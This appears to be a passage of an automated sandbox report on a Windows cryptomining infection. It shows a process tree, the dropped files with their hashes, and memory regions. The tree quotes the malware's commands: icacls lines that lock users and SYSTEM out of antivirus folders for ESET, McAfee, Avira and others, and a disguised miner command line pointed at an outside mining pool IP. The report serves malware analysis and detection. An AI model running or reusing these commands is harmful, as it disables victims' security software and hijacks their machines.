                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                        4⤵
                                                                                                                          PID:2064
                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                            icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                            5⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:1904
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                          4⤵
                                                                                                                            PID:1672
                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                              icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                              5⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:2760
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                            4⤵
                                                                                                                              PID:1288
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                5⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:2768
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                              4⤵
                                                                                                                                PID:1620
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                  5⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:2776
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                4⤵
                                                                                                                                  PID:1292
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                    5⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:2260
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                  4⤵
                                                                                                                                    PID:2088
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                      5⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      PID:1388
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                    4⤵
                                                                                                                                      PID:2604
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                        5⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:2576
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                      4⤵
                                                                                                                                        PID:1452
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                          5⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:2868
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                        4⤵
                                                                                                                                          PID:2804
                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                            5⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:1184
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                          4⤵
                                                                                                                                            PID:2580
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                              5⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:2104
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                            4⤵
                                                                                                                                              PID:2412
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                5⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:2456
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                              4⤵
                                                                                                                                                PID:2436
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                  5⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:552
                                                                                                                                              • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                PID:2240
                                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                                          taskeng.exe {38F7F940-E9B4-4AD3-A79E-72A1BEE3C7C4} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
                                                                                                                                          1⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:2628
                                                                                                                                          • C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                            C:\Programdata\RealtekHD\taskhost.exe
                                                                                                                                            2⤵
                                                                                                                                            • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                            PID:2492
                                                                                                                                            • C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                              C:\Programdata\WindowsTask\winlogon.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2176
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                                                                                                4⤵
                                                                                                                                                  PID:1976
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /query /fo list
                                                                                                                                                    5⤵
                                                                                                                                                      PID:936
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2696
                                                                                                                                                    • C:\Windows\system32\ipconfig.exe
                                                                                                                                                      ipconfig /flushdns
                                                                                                                                                      4⤵
                                                                                                                                                      • Gathers network information
                                                                                                                                                      PID:748
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1772
                                                                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                                                                        gpupdate /force
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1812
                                                                                                                                                      • C:\ProgramData\WindowsTask\MicrosoftHost.exe
                                                                                                                                                        C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u CPU --donate-level=1 -k -t4
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:2128
                                                                                                                                                    • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                      C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:1800

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\ProgramData\RealtekHD\taskhost.exe

                                                                                                                                                    Filesize

                                                                                                                                                    1.7MB

                                                                                                                                                    MD5

                                                                                                                                                    de88d7ec667dea756d236e9053d7eeb9

                                                                                                                                                    SHA1

                                                                                                                                                    ac6b619acece942f27d75e1e0ea46b94bc9b91a9

                                                                                                                                                    SHA256

                                                                                                                                                    7ce418c4a92d459b2a1971bd32ac4dfea3711393b1dce49d0c92d7124d71e157

                                                                                                                                                    SHA512

                                                                                                                                                    5c655def3bb5ab9c0255802e0c40667f16ef48f1042ff1c57e13199b38f0059cbff33517d6e940c39ca7d16d346830a92800e89058ae58ee02826472b0935942

                                                                                                                                                  • C:\ProgramData\RealtekHD\taskhostw.exe

                                                                                                                                                    Filesize

                                                                                                                                                    2.9MB

                                                                                                                                                    MD5

                                                                                                                                                    53f8233b58b8e3ba3e92d82cca29f119

                                                                                                                                                    SHA1

                                                                                                                                                    ea7cae955f884aab7d048b6297fc0e472bb94a76

                                                                                                                                                    SHA256

                                                                                                                                                    a114d6bccc183021671bbb15426cf227ec487f2379094ed6f19e4211efd3ce65

                                                                                                                                                    SHA512

                                                                                                                                                    d1d4f385be4c8b8bdd16c8a8cc1fb75b6cee094ce69633724a4f53255dc560983097d26dc3b4d3e44a0eb718ac8ddb8d37c3b80f2c8747810f9c873ced558b23

                                                                                                                                                  • C:\ProgramData\Setup\taskhost.exe

                                                                                                                                                    Filesize

                                                                                                                                                    5.5MB

                                                                                                                                                    MD5

                                                                                                                                                    ebe2c898363c9e42908504bf053ad018

                                                                                                                                                    SHA1

                                                                                                                                                    9b02d448e534d6078f117db09c7ceca3c63e8ea5

                                                                                                                                                    SHA256

                                                                                                                                                    f034d58596cbb1023b31c891bce2b14207700fa27fd1d5836b177327c9755175

                                                                                                                                                    SHA512

                                                                                                                                                    c8d23c03869541cf6f2d108ab00b790286f95b23d729a7d44a3b0cf75ba497831b0c1cbc6860e0d51e2d49edb03a2a9c3ee0272a7cc679ffd4f963df03010b86

                                                                                                                                                  • C:\ProgramData\WindowsTask\MicrosoftHost.exe

                                                                                                                                                    Filesize

                                                                                                                                                    2.0MB

                                                                                                                                                    MD5

                                                                                                                                                    a74ad3584394b0766ada52191b245013

                                                                                                                                                    SHA1

                                                                                                                                                    6b25f4ba2c86541d4e2e5872a63fa1005373966b

                                                                                                                                                    SHA256

                                                                                                                                                    1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737

                                                                                                                                                    SHA512

                                                                                                                                                    5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

                                                                                                                                                  • C:\ProgramData\WindowsTask\OpenCL.DLL

                                                                                                                                                    Filesize

                                                                                                                                                    88KB

                                                                                                                                                    MD5

                                                                                                                                                    12d6e576f527f671dfe0815de2902f36

                                                                                                                                                    SHA1

                                                                                                                                                    60a178947aef515367cc3489ce64b36332ecd78f

                                                                                                                                                    SHA256

                                                                                                                                                    7cc0d32b00f4596bf0a193f9929e6c628bc1b9354678327f59db0bd516a0dd6b

                                                                                                                                                    SHA512

                                                                                                                                                    c1b7c1669ec3b81249bb3ea50dfa41804470a21aa98e990d5f1656d7fa155bfc61a33f1113714ba741bbc0cdd710349ceb26b10f767c538a6d9c4cca661f562a

                                                                                                                                                  • C:\ProgramData\WindowsTask\WinRing0x64.sys

                                                                                                                                                    Filesize

                                                                                                                                                    14KB

                                                                                                                                                    MD5

                                                                                                                                                    0c0195c48b6b8582fa6f6373032118da

                                                                                                                                                    SHA1

                                                                                                                                                    d25340ae8e92a6d29f599fef426a2bc1b5217299

                                                                                                                                                    SHA256

                                                                                                                                                    11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                                                                                                                                                    SHA512

                                                                                                                                                    ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                                                                                                                                                  • C:\ProgramData\WindowsTask\winlogon.exe

                                                                                                                                                    Filesize

                                                                                                                                                    381KB

                                                                                                                                                    MD5

                                                                                                                                                    ec0f9398d8017767f86a4d0e74225506

                                                                                                                                                    SHA1

                                                                                                                                                    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

                                                                                                                                                    SHA256

                                                                                                                                                    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

                                                                                                                                                    SHA512

                                                                                                                                                    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                                                                                                                    Filesize

                                                                                                                                                    70KB

                                                                                                                                                    MD5

                                                                                                                                                    49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                                    SHA1

                                                                                                                                                    1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                                    SHA256

                                                                                                                                                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                                    SHA512

                                                                                                                                                    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                    Filesize

                                                                                                                                                    342B

                                                                                                                                                    MD5

                                                                                                                                                    3ef069807ffd69363e4722be8c064113

                                                                                                                                                    SHA1

                                                                                                                                                    88c11ca8e42aa6feba3bb9973ea05504cd9c2b02

                                                                                                                                                    SHA256

                                                                                                                                                    840ab194309422ec0bdf7845ac39b1764c044d641420b608291128cec10c1583

                                                                                                                                                    SHA512

                                                                                                                                                    76ce2760c4ed73c8eff9fc8414fffe95a83c12016011e0f9b2fd272cc0203b362e99e0f8e635d4debb6400970645355839e2c91892c234abed90dc08eb6651da

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Cab5EF.tmp

                                                                                                                                                    Filesize

                                                                                                                                                    65KB

                                                                                                                                                    MD5

                                                                                                                                                    ac05d27423a85adc1622c714f2cb6184

                                                                                                                                                    SHA1

                                                                                                                                                    b0fe2b1abddb97837ea0195be70ab2ff14d43198

                                                                                                                                                    SHA256

                                                                                                                                                    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                                                                                                                                                    SHA512

                                                                                                                                                    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Tar7AB.tmp

                                                                                                                                                    Filesize

                                                                                                                                                    181KB

                                                                                                                                                    MD5

                                                                                                                                                    4ea6026cf93ec6338144661bf1202cd1

                                                                                                                                                    SHA1

                                                                                                                                                    a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                                                                    SHA256

                                                                                                                                                    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                                                                    SHA512

                                                                                                                                                    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                                                                  • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    78a6999aab837db409e9ab000a77a271

                                                                                                                                                    SHA1

                                                                                                                                                    a3f75992147f10e2f16257a59cf7979c85d144cc

                                                                                                                                                    SHA256

                                                                                                                                                    96e81b168383ac3d2d95528b4870d5099a4ce22e4dc0cba15ab65a7f5520c3ba

                                                                                                                                                    SHA512

                                                                                                                                                    179848931237b8b1e272d8a75ac638b44461b421abba54bff784ca6d71ec4407b2249323c548763a42f0921419a873d3fdb3e058ee416290f5a85b5dadb0387a

                                                                                                                                                  • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                    MD5

                                                                                                                                                    5ef47a9801b03d36f4e937e18de1f51b

                                                                                                                                                    SHA1

                                                                                                                                                    04212c27ba6858c54e6fad363f141fa52a8c4ad6

                                                                                                                                                    SHA256

                                                                                                                                                    a368d680dd1702b93ef730844ff4cc81f53ec68fa3bd753630e1a38576c08520

                                                                                                                                                    SHA512

                                                                                                                                                    99324ffef9517a8f9cc43ccc19065516d4038d826ac6b295880d6e33ac2f4834d04b69de1a9419cd55c7acf4d415e6e19b6eaf5f5de5f11e8de1bc82e5c81b24

                                                                                                                                                  • C:\programdata\microsoft\temp\H.bat

                                                                                                                                                    Filesize

                                                                                                                                                    5KB

                                                                                                                                                    MD5

                                                                                                                                                    ec45b066a80416bdb06b264b7efed90d

                                                                                                                                                    SHA1

                                                                                                                                                    6679ed15133f13573c1448b5b16a4d83485e8cc9

                                                                                                                                                    SHA256

                                                                                                                                                    cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e

                                                                                                                                                    SHA512

                                                                                                                                                    0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

                                                                                                                                                  • \ProgramData\Setup\update.exe

                                                                                                                                                    Filesize

                                                                                                                                                    7.8MB

                                                                                                                                                    MD5

                                                                                                                                                    36aadfa2332dc7e5077455ae5cb423ef

                                                                                                                                                    SHA1

                                                                                                                                                    47cdc34d12f4820a005bba735caed72296d2400a

                                                                                                                                                    SHA256

                                                                                                                                                    2240022c8262345cf4f7280141f53fc6fcc29b5436cf72a03581906665b9dda9

                                                                                                                                                    SHA512

                                                                                                                                                    4dfaae0949f7c362221d14d3d080e8eaa5d7a2e43892aec653f1045c2044a0d24390704774748ab7d1252ba8f3dea5008970f1e0d879ce3b3dc190002db2f56c

                                                                                                                                                  • memory/2128-646-0x0000000000100000-0x0000000000110000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    64KB

                                                                                                                                                  • memory/2176-457-0x0000000000F90000-0x000000000107C000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    944KB

                                                                                                                                                  • memory/2176-468-0x0000000000F90000-0x000000000107C000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    944KB